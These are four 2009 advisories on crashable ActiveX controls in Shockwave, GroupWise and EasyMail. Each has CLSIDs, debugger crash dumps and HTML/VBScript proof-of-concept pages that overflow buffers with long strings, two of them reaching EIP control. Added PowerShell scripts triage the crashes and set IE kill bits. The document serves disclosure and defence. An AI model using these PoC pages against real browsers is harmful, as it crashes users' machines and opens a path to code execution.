Author: Francis Provencher (Protek Research Lab's)
#####################################################################################
Application: Adobe ShockWave Player (11.5.1.601)
Platforms: Windows XP Professional French SP2 and SP3
crash: IE 6.0.2900.2180
Exploitation: remote DoS
Date: 2009-08-24
Author: Francis Provencher (Protek Research Lab's)
#####################################################################################
1) Introduction
2) Technical details and bug
3) The Code
#####################################################################################
===============
1) Introduction
===============
Over 450 million Internet-enabled desktops have installed Adobe Shockwave
Player.
These people now have access to some of the best the Web has to offer -
including dazzling 3D games and entertainment,
interactive product demonstrations, and online learning applications. Shockwave
Player displays Web content that has been created by Adobe Director.
#####################################################################################
============================
2) Technical details
============================
Name: SwDir.dll
Ver.: 11.5.1.601
CLSID: {233C1507-6A77-46A4-9443-F871F945D258}
(d40.b20): Stack overflow - code c00000fd
eax=00305004 ebx=00000003 ecx=00032f80 edx=00400000 esi=09ae0024 edi=00400002
eip=69214965 esp=0012df78 ebp=0012df8c iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010202
#####################################################################################
===========
3) The Code
===========
Proof of concept DoS code:
<html>
<object classid='clsid:233C1507-6A77-46A4-9443-F871F945D258'
id='ShockW'></object>
<script language='vbscript'>
argCount = 1
' 2 MB string of "A" assigned to the PlayerVersion property (stack overflow, c00000fd)
arg1=String(2097152, "A")
ShockW.PlayerVersion = arg1
</script>
</html>
#####################################################################################
#####################################################################################
Application: Novell Groupwise Client 7.0.3.1294
Platforms: Windows XP Professional French SP2 and SP3
crash: IE 6.0.2900.2180
Exploitation: remote DoS
Date: 2009-08-24
Author: Francis Provencher (Protek Research Lab's)
#####################################################################################
1) Introduction
2) Technical details and bug
3) The Code
#####################################################################################
===============
1) Introduction
===============
GroupWise is a messaging and collaborative software platform from Novell that
supports email, calendaring, personal information management, instant
messaging, and document management. The platform consists of the client
software, which is available for Windows, Mac OS X, and Linux, and the server
software, which is supported on Windows Server, Netware, and Linux. The latest
generation of the platform is GroupWise 8, which was launched in 2008.
#####################################################################################
============================
2) Technical details
============================
Name: gxmim1.dll
Ver.: 7.0.3.1294
CLSID: {9796BED2-C1CF-11D2-9384-0008C7396667}
#####################################################################################
===========
3) The Code
===========
Proof of concept DoS code:
<html>
<object classid='clsid:9796BED2-C1CF-11D2-9384-0008C7396667'
id='GWComposeCtl'></object>
<script language='vbscript'>
argCount = 1
' over-long font name passed to the SetFontFace method
arg1="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
GWComposeCtl.SetFontFace arg1
</script>
</html>
#####################################################################################
#####################################################################################
Application: EasyMail Quicksoft 6.0.2.0
Platforms: Windows XP Professional French SP2
crash: IE 6.0.2900.2180
Exploitation: remote Code Execution
Date: 2009-08-24
Author: Francis Provencher (Protek Research Lab's)
#####################################################################################
1) Introduction
2) Technical details and bug
3) The Code
#####################################################################################
===============
1) Introduction
===============
Create, send, download, parse, print and store internet email messages in your
classic windows application. Designed for Visual Basic, ASP, C++, Delphi,
ColdFusion, PowerBuilder, Access and other development environments. COM or
standard DLL interfaces. This is the software that processes hundreds of
millions of email messages on the Internet every day.
#####################################################################################
============================
2) Technical details
============================
Name: emimap4.dll
Ver.: 6.0.2.0
CLSID: {0CEA3FB1-7F88-4803-AA8E-AD021566955D}
ModLoad: 037f0000 0381e000 C:\WINDOWS\system32\emimap4.dll
(2088.2388): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0380c878 ecx=0012df70 edx=00000039 esi=0033df18 edi=0033e14c
eip=41414141 esp=0012df88 ebp=41414141 iopl=0 nv up ei pl zr na pe nc
#####################################################################################
===========
3) The Code
===========
Proof of concept DoS code:
<html>
<object classid='clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D'
id='target'></object>
<script language='vbscript'>
' over-long value assigned to the LicenseKey property (EIP/EBP end up as 41414141)
Scrap = unescape("http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
code = Scrap
target.LicenseKey = code
</script>
</html>
#####################################################################################
#####################################################################################
Application: EasyMail Quicksoft 6.0.2.0
Platforms: Windows XP Professional French SP2
crash: IE 6.0.2900.2180
Exploitation: remote Code Execution
Date: 2009-08-24
Author: Francis Provencher (Protek Research Lab's)
#####################################################################################
1) Introduction
2) Technical details and bug
3) The Code
#####################################################################################
===============
1) Introduction
===============
Create, send, download, parse, print and store internet email messages in your
classic windows application. Designed for Visual Basic, ASP, C++, Delphi,
ColdFusion, PowerBuilder, Access and other development environments. COM or
standard DLL interfaces. This is the software that processes hundreds of
millions of email messages on the Internet every day.
#####################################################################################
============================
2) Technical details
============================
Name: emmailstore.dll
Ver.: 6.0.2.0
CLSID: {18A76B9A-45C1-11D3-80DC-00C04F6B92D0}
ModLoad: 10000000 1002c000 C:\WINDOWS\system32\emmailstore.dll
(1670.59c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=000002bd ebx=00000000 ecx=0003ea80 edx=00030608 esi=00038790 edi=00000193
eip=41414141 esp=0013eb44 ebp=0013eb60 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
41414141 ?? ???
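The three WinDbg records quoted in these advisories are of two different kinds, and that difference is what separates the "remote DoS" ratings from the "remote Code Execution" ones. The following PowerShell is an added triage helper, not part of the original advisories: it parses the exception code and the eip/ebp registers out of each record and applies the rule the advisories rely on. Exception c00000fd with an EIP still inside the module is stack exhaustion (a pure crash); an access violation (c0000005) where EIP is made entirely of the PoC's fill byte (0x41, the "A" from String(n, "A")) means caller data overwrote a saved return address. The records below are copied from the advisories; the classification rule is the usual crash-triage heuristic, not a statement from the vendor.

```powershell
# Added example (not from the advisories): classify WinDbg crash records.

function Test-FillPattern {
    # True when a 32-bit register value is entirely the PoC fill byte 0x41 ('A').
    param([string]$Value)
    return [bool]($Value -match '^(41){4}$')
}

function Get-CrashTriage {
    param([Parameter(Mandatory)][string]$CrashText)

    $code = $null; $eip = $null; $ebp = $null
    foreach ($line in ($CrashText -split "`r?`n")) {
        if ($line -match 'code\s+([0-9a-fA-F]{8})') { $code = $Matches[1].ToLower() }
        if ($line -match 'eip=([0-9a-fA-F]{8})')   { $eip  = $Matches[1].ToLower() }
        if ($line -match 'ebp=([0-9a-fA-F]{8})')   { $ebp  = $Matches[1].ToLower() }
    }
    if (-not $code -or -not $eip) { throw 'No exception code / EIP found in record' }

    $verdict = switch ($code) {
        'c00000fd' { 'stack exhaustion (DoS): guard page hit, EIP still inside the module' }
        'c0000005' {
            if (Test-FillPattern $eip) { 'controlled EIP (return address overwritten): memory corruption, not just DoS' }
            else { 'access violation with uncontrolled EIP: needs further triage' }
        }
        default    { "unclassified exception $code" }
    }

    [pscustomobject]@{
        ExceptionCode = $code
        Eip           = $eip
        EbpControlled = Test-FillPattern $ebp
        Verdict       = $verdict
    }
}

# Records copied from the advisories above.
$shockwave = @'
(d40.b20): Stack overflow - code c00000fd
eax=00305004 ebx=00000003 ecx=00032f80 edx=00400000 esi=09ae0024 edi=00400002
eip=69214965 esp=0012df78 ebp=0012df8c iopl=0 nv up ei pl nz na po nc
'@

$emimap4 = @'
(2088.2388): Access violation - code c0000005 (first chance)
eax=00000000 ebx=0380c878 ecx=0012df70 edx=00000039 esi=0033df18 edi=0033e14c
eip=41414141 esp=0012df88 ebp=41414141 iopl=0 nv up ei pl zr na pe nc
'@

$emmailstore = @'
(1670.59c): Access violation - code c0000005 (first chance)
eax=000002bd ebx=00000000 ecx=0003ea80 edx=00030608 esi=00038790 edi=00000193
eip=41414141 esp=0013eb44 ebp=0013eb60 iopl=0 nv up ei pl nz na pe nc
'@

$shockwave, $emimap4, $emmailstore | ForEach-Object { Get-CrashTriage $_ } | Format-Table -AutoSize
```

Run as a script: the Shockwave record is reported as stack exhaustion, while both EasyMail records are flagged as controlled EIP (the emimap4.dll case additionally has EBP controlled, the emmailstore.dll case does not). The check is deliberately narrow: it only recognises the 0x41 fill used by these PoCs, so a crash produced with a different pattern would need the pattern byte changed in Test-FillPattern.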
#####################################################################################
===========
3) The Code
===========
Proof of concept DoS code:
<html>
<object classid='clsid:18A76B9A-45C1-11D3-80DC-00C04F6B92D0'
id='target'></object>
<script language='vbscript'>
argCount = 2
' 402-byte string as the first argument of CreateStore (EIP ends up as 41414141)
arg1=String(402, "A")
arg2=1
target.CreateStore arg1 ,arg2
</script>
</html>
#####################################################################################
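All four advisories describe ActiveX controls, identified by CLSID, that Internet Explorer will instantiate from a web page. Until a vendor fix is installed, the standard Microsoft mitigation is the kill bit: a "Compatibility Flags" DWORD with bit 0x400 set under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}, which stops IE from loading that control. The following PowerShell is an added administration script, not part of the original advisories: it audits the four CLSIDs listed above and, with -Apply, sets the kill bit on any that are still open. The Wow6432Node path covers 32-bit IE on 64-bit Windows and is skipped where it does not exist (such as the 32-bit XP systems the advisories were tested on). Note that a kill bit only blocks instantiation inside IE; it does not fix the controls themselves.

```powershell
# Added example (not from the advisories): audit / set the IE kill bit
# for the CLSIDs named in the four advisories. Run elevated to apply.
param([switch]$Apply)

$KillBit = 0x400   # CLSID-level "kill bit" in Compatibility Flags
$Clsids = @{
    '{233C1507-6A77-46A4-9443-F871F945D258}' = 'Adobe Shockwave SwDir.dll 11.5.1.601'
    '{9796BED2-C1CF-11D2-9384-0008C7396667}' = 'Novell GroupWise gxmim1.dll 7.0.3.1294'
    '{0CEA3FB1-7F88-4803-AA8E-AD021566955D}' = 'EasyMail emimap4.dll 6.0.2.0'
    '{18A76B9A-45C1-11D3-80DC-00C04F6B92D0}' = 'EasyMail emmailstore.dll 6.0.2.0'
}
$Hives = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Get-CompatibilityFlags {
    param([string]$Key)
    $item = Get-ItemProperty -Path $Key -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.'Compatibility Flags'
}

function Test-KillBit {
    # True when the kill bit is already set for this CLSID under this hive.
    param([string]$Hive, [string]$Clsid)
    $key = Join-Path $Hive $Clsid
    if (-not (Test-Path $key)) { return $false }
    $flags = Get-CompatibilityFlags $key
    return ($null -ne $flags) -and (($flags -band $KillBit) -eq $KillBit)
}

function Set-KillBit {
    # OR the kill bit into the existing flags, preserving any other bits.
    param([string]$Hive, [string]$Clsid)
    $key = Join-Path $Hive $Clsid
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    $current = Get-CompatibilityFlags $key
    if ($null -eq $current) { $current = 0 }
    Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Type DWord -Value ($current -bor $KillBit)
}

foreach ($hive in $Hives) {
    if (-not (Test-Path $hive)) { continue }   # Wow6432Node is absent on 32-bit Windows
    "== $hive"
    foreach ($clsid in $Clsids.Keys) {
        $set = Test-KillBit -Hive $hive -Clsid $clsid
        $state = if ($set) { 'KILLED' } else { 'OPEN' }
        '{0,-7} {1}  {2}' -f $state, $clsid, $Clsids[$clsid]
        if (-not $set -and $Apply) {
            Set-KillBit -Hive $hive -Clsid $clsid
            '        -> kill bit set'
        }
    }
}
```

Without -Apply the script is read-only and can be run as a normal user to see which of the four controls IE on that machine would still load; with -Apply it needs an elevated prompt. The same key layout is what Microsoft's own kill-bit security updates write, so a later vendor update that registers a fixed control is unaffected by these entries only if the fixed control uses a new CLSID; otherwise the kill bit has to be cleared once the fix is deployed.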